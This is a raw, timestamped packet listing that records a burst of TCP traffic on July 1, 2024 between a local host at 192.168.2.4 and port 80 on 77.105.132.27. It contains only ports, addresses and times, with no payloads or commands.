Jul 1, 2024 09:16:13.695652962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.695667982 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.696461916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.696474075 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.696495056 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.696502924 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.696527958 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.730534077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.730644941 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.730658054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.730726004 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.730809927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.730822086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.730833054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.730849028 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.730850935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.730863094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.730876923 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.730906963 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.776366949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.776397943 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.776410103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.776458979 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.776500940 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.776532888 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.776550055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.776561975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.776575089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.776590109 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.776617050 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.777121067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777132034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777143002 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777154922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777159929 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.777168989 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777179003 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.777208090 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.777384996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777396917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777407885 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777426004 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.777453899 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.777462959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777475119 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777486086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777497053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777506113 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.777508974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.777532101 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.777559996 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.778461933 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.778475046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.778486967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.778497934 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.778508902 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.778518915 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.778521061 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.778532982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.778544903 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.778554916 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.778556108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.778567076 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.778582096 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.778595924 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.779221058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.779232979 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.779242992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.779253006 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.779268026 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.779270887 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.779278994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.779289961 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.779298067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.779309034 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.779310942 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.779335022 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.779360056 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.780035019 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780046940 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780060053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780072927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780083895 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780087948 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.780095100 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780106068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780117035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780121088 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.780144930 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.780160904 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.780807972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780819893 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780836105 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780844927 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.780847073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780858994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780865908 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.780869961 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780880928 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780885935 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.780889988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780900955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780914068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.780917883 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.780937910 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.780958891 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.781789064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.781801939 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.781814098 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.781824112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.781836033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.781843901 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.781847000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.781857014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.781868935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.781878948 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.781883955 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.781900883 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.781918049 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.782746077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.782757998 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.782768011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.782779932 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.782790899 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.782797098 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.782804012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.782814980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.782825947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.782831907 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.782836914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.782850027 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.782870054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.783771992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.783785105 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.783796072 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.783806086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.783816099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.783822060 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.783828020 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.783839941 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.783843040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.783850908 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.783863068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.783869982 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.783874035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.783888102 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.783915043 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.784682035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.784693956 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.784712076 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.784723997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.784730911 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.784735918 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.784748077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.784751892 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.784759045 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.784770012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.784780979 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.784782887 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.784796953 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.784806967 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.784822941 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.784842014 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.785636902 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.785650015 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.785661936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.785672903 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.785681963 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.785685062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.785693884 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.785697937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.785708904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.785720110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.785722971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.785731077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.785748959 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.785748959 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.785768032 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.786564112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.786576986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.786587954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.786600113 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.786603928 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.786611080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.786623955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.786639929 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.786657095 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.825001001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.825023890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.825037003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.825063944 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.825092077 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.825179100 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.825191975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.825203896 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.825216055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.825222015 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.825242043 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.825262070 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.870923996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.870950937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.870963097 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871026039 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.871026039 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.871161938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871172905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871185064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871196032 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871217966 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.871232986 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.871665955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871676922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871682882 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871687889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871692896 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871699095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871704102 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871715069 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871721029 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.871754885 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.871788979 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.872545958 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.872556925 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.872567892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.872580051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.872591019 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.872591019 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.872603893 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.872615099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.872626066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.872629881 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.872637033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.872648001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.872652054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.872664928 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.872687101 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.873378038 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.873450994 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.873503923 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.873569012 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.873575926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.873588085 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.873599052 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.873613119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.873644114 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.873955965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.873967886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.873977900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.873991013 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.873996973 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.874001980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874012947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874025106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874028921 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.874044895 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.874064922 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.874650955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874663115 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874672890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874682903 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874695063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874706984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874711037 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.874718904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874730110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874737978 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.874741077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874752045 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.874756098 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.874783993 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.875647068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.875660896 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.875672102 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.875682116 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.875690937 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.875694036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.875705957 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.875715017 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.875716925 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.875727892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.875737906 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.875750065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.875751019 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.875766993 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.875781059 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.876688004 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.876703024 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.876714945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.876725912 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.876732111 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.876740932 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.876743078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.876753092 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.876765013 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.876775026 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.876787901 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.876789093 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.876801014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.876804113 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.876840115 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.877641916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.877655983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.877666950 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.877679110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.877688885 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.877690077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.877702951 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.877712965 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.877712965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.877727032 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.877737999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.877751112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.877763033 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.877782106 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.878469944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878484011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878494978 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878505945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878515959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878520012 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.878528118 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878545046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878555059 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.878556013 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878566980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878577948 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878585100 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.878588915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878599882 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.878604889 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.878629923 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.879409075 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.879420996 CEST	80	49752	77.105.132.27	192.168.2.4
